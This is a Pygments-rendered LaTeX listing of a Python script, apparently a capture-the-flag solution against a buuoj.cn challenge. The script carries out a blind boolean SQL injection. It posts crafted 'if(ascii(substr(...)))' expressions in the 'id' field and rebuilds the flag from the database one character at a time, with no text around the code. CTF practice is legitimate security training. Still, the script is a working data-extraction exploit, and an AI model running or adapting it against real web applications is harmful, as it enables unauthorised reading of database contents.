\begin{Verbatim}[commandchars=\\\{\}]
\PYG{k+kn}{import} \PYG{n+nn}{requests}
\PYG{k+kn}{import} \PYG{n+nn}{string}

\PYG{n}{flag} \PYG{o}{=} \PYG{l+s+s1}{\PYGZsq{}\PYGZsq{}}
\PYG{n}{url} \PYG{o}{=} \PYG{l+s+s1}{\PYGZsq{}http://85b36b6c\PYGZhy{}c28f\PYGZhy{}4ae1\PYGZhy{}b573\PYGZhy{}634002afb14a.node5.buuoj.cn:81/\PYGZsq{}}
\PYG{n}{ascii\PYGZus{}list} \PYG{o}{=} \PYG{n}{string}\PYG{o}{.}\PYG{n}{printable}
\PYG{n}{done} \PYG{o}{=} \PYG{l+m+mi}{0}
\PYG{n}{index} \PYG{o}{=} \PYG{l+m+mi}{10}

\PYG{k}{while} \PYG{n}{done} \PYG{o}{!=} \PYG{l+m+mi}{1}\PYG{p}{:}
    \PYG{k}{for} \PYG{n}{i} \PYG{o+ow}{in} \PYG{n}{ascii\PYGZus{}list}\PYG{p}{:}
        \PYG{n+nb}{input} \PYG{o}{=} \PYG{l+s+s1}{\PYGZsq{}if(ascii(substr((select(flag)from(flag)),}\PYG{l+s+si}{\PYGZob{}0\PYGZcb{}}\PYG{l+s+s1}{,1))=}\PYG{l+s+si}{\PYGZob{}1\PYGZcb{}}\PYG{l+s+s1}{,1,2)\PYGZsq{}}\PYG{o}{.}\PYG{n}{format}\PYG{p}{(}\PYG{n}{index}\PYG{p}{,} \PYG{n+nb}{ord}\PYG{p}{(}\PYG{n}{i}\PYG{p}{))}
        \PYG{n}{post\PYGZus{}in} \PYG{o}{=} \PYG{p}{\PYGZob{}}\PYG{l+s+s2}{\PYGZdq{}id\PYGZdq{}}\PYG{p}{:} \PYG{n+nb}{input}\PYG{p}{\PYGZcb{}}
        \PYG{n}{res} \PYG{o}{=} \PYG{n}{requests}\PYG{o}{.}\PYG{n}{post}\PYG{p}{(}\PYG{n}{url}\PYG{o}{=}\PYG{n}{url}\PYG{p}{,} \PYG{n}{data}\PYG{o}{=}\PYG{n}{post\PYGZus{}in}\PYG{p}{)}

        \PYG{k}{if} \PYG{l+s+s1}{\PYGZsq{}glzjin\PYGZsq{}} \PYG{o+ow}{in} \PYG{n}{res}\PYG{o}{.}\PYG{n}{text}\PYG{p}{:}
            \PYG{n}{flag} \PYG{o}{+=} \PYG{n}{i}
            \PYG{n+nb}{print}\PYG{p}{(}\PYG{n}{flag}\PYG{p}{)}
            \PYG{n}{index} \PYG{o}{+=} \PYG{l+m+mi}{1}

            \PYG{k}{if} \PYG{n}{i} \PYG{o}{==} \PYG{l+s+s1}{\PYGZsq{}\PYGZcb{}\PYGZsq{}}\PYG{p}{:}
                \PYG{n}{done} \PYG{o}{=} \PYG{l+m+mi}{1}
            \PYG{k}{break}
\end{Verbatim}
